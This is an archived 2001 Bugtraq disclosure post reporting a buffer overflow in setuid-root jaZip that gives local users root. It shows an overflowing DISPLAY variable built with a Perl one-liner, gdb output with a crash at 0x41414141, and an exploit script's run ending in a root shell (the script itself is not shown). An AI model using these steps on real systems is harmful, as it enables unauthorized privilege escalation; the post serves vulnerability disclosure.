Home page logo
/

bugtraq logo Bugtraq mailing list archives

Vulnerability in jaZip.
From: teleh0r <teleh0r () DOGLOVER COM>
Date: Sun, 14 Jan 2001 17:05:48 +0000

Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

  [root () localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root () localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r () localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r () localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard

Attachment: jazip-exploit.pl
Description:


  By Date           By Thread  

Current thread:
  • Vulnerability in jaZip. teleh0r (Jan 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]